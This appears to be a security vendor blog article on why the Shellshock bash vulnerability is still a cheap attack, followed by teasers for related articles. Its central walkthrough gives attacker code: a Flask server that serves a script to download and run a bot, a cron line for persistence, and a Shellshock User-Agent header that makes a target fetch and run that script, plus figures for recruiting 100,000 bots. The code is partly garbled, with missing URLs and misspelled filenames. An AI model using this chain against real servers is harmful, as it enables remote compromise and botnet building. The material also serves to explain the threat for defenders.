We have all heard of Shellshock. For those who are not aware, Shellshock is a Linux-targeting vulnerability that was discovered in late 2014 and published as CVE-2014-6271.

The exploit was found within the bourne-again shell (BASH), which was the default command shell on almost every Linux and Unix system back then. It enables attackers to execute commands with super-user privileges remotely.

Bargain Bin for Bad Actors

Since many applications rely on the BASH, the most common attack method is to send a command sequence to the web server to be interpreted with the BASH.

That said, why is Shellshock still in use? The answer is simple: It’s a very cheap attack. Although servers could have been patched for more than two years now, studies have shown that some remain vulnerable.

Attackers need only a server, basic programming skills and access to malware to carry out this type of attack. The level of knowledge and effort required is quite low. Fraudsters can simply launch attacks against hundreds of different IP addresses per minute and wait to hit a vulnerable server by chance. Furthermore, a Shellshock attack can be carried out for the low price of 4.95 euros, or just a little more than $5, a month.

Setting Up a Shellshock Attack

Let’s walk through the setup of an attacking server. First we need a web server to host our malicious code. We could set up our own Apache or lighthttp server. For this example, however, we will use some basic Python code — namely, Python Flask — just to speed up the setup phase of our attacking server.

On the main page, we will return a shell script that we would like to have executed on the target server, so we can always adjust our code without the need to change our attack script:

import flask

@app.route(“/”)

def main_site():

return ”’#/bin/bash

curl /perlbot > /usr/local/perlbot
chmod +x /usr/local/perbot
/usr/local/perlbot”’

The bash script is simple:

  1. Download the perbot from this server and save it to a certain path.
  2. Make the file executable.
  3. Execute it.

For the sake of persistence, we could add a line to execute our bot after every reboot. For example:

echo ” @reboot /usr/local/perlbot” > /etc/cron.d/daily

Now we need to get the target to execute this BASH script and prepare the statement to exploit the Shellshock vulnerability:

curl -H “User-Agent: () { :; }; curl > myscript.sh ; sh myscrypt.sh”

Curl will download the BASH script, save it as myscript.sh and execute it afterwards. The final step is to have a downloadable file to add a simple function to our web server:

@app.route(‘/perlbot’, methods=[‘GET’, ‘POST’])
def download(filename):
uploads = os.path.join(current_app.root_path, app.config[‘UPLOAD_FOLDER’])
return send_from_directory(directory=uploads, filename=”perlbot”)

Finally, we are done.

Simple Math

With some more scripting effort, you could easily execute the curl statement against a full network range, or even the whole internet, but it will take a while.

In the end, it is simple math. Statistics show that about 10 percent of all servers are not patched. So let’s say we can attack 1 million servers in six months. That equates to 100,000 bots at a price of 29.70 euros (about $31) — certainly cheap enough to be worth a cybercriminal’s time.

Read the X-Force Research Report: Beware of older cyber attacks

More from Software Vulnerabilities

Analysis of a Remote Code Execution (RCE) Vulnerability in Cobalt Strike 4.7.1

Command & Control (C2) frameworks are a very sensitive component of Red Team operations. Often, a Red Team will be in a highly privileged position on a target’s network, and a compromise of the C2 framework could lead to a compromise of both the red team operator’s system and control over beacons established on a target’s systems. As such, vulnerabilities in C2 frameworks are high priority targets for threat actors and Counterintelligence (CI) operations. On September 20, 2022, HelpSystems published…

Controlling the Source: Abusing Source Code Management Systems

For full details on this research, see the X-Force Red whitepaper “Controlling the Source: Abusing Source Code Management Systems”. This material is also being presented at Black Hat USA 2022. Source Code Management (SCM) systems play a vital role within organizations and have been an afterthought in terms of defenses compared to other critical enterprise systems such as Active Directory. SCM systems are used in the majority of organizations to manage source code and integrate with other systems within the…

X-Force Research Update: Top 10 Cybersecurity Vulnerabilities of 2021

From 2020 to 2021, there was a 33% increase in the number of reported incidents caused by vulnerability exploitation, according to the 2022 X-Force Threat Intelligence Index. A large percentage of these exploited vulnerabilities were newly discovered; in fact, four out of the top five vulnerabilities in 2021 were newer vulnerabilities. Vulnerability exploitation was the second most common initial infection vector observed by IBM Security X-Force in 2021, falling closely behind phishing. Cybercriminals are finding new ways of bypassing security…

How Log4j Vulnerability Could Impact You

MITIGATION UPDATE: New vulnerability in 2.17 — CVE-2021-44832 Upgrade to 2.17.1 to mitigate this vulnerability Do NOT enable JNDI in any versions Follow: https://logging.apache.org/log4j/2.x/security.html If you hadn’t heard of Apache Log4j, chances are it’s on your radar now. In fact, you may have been using it for years. Log4j is a logging library. Imagine writing your daily activities into a notebook. That notebook is Log4j. Developers and programmers use it to take notes about what’s happening on applications and servers.…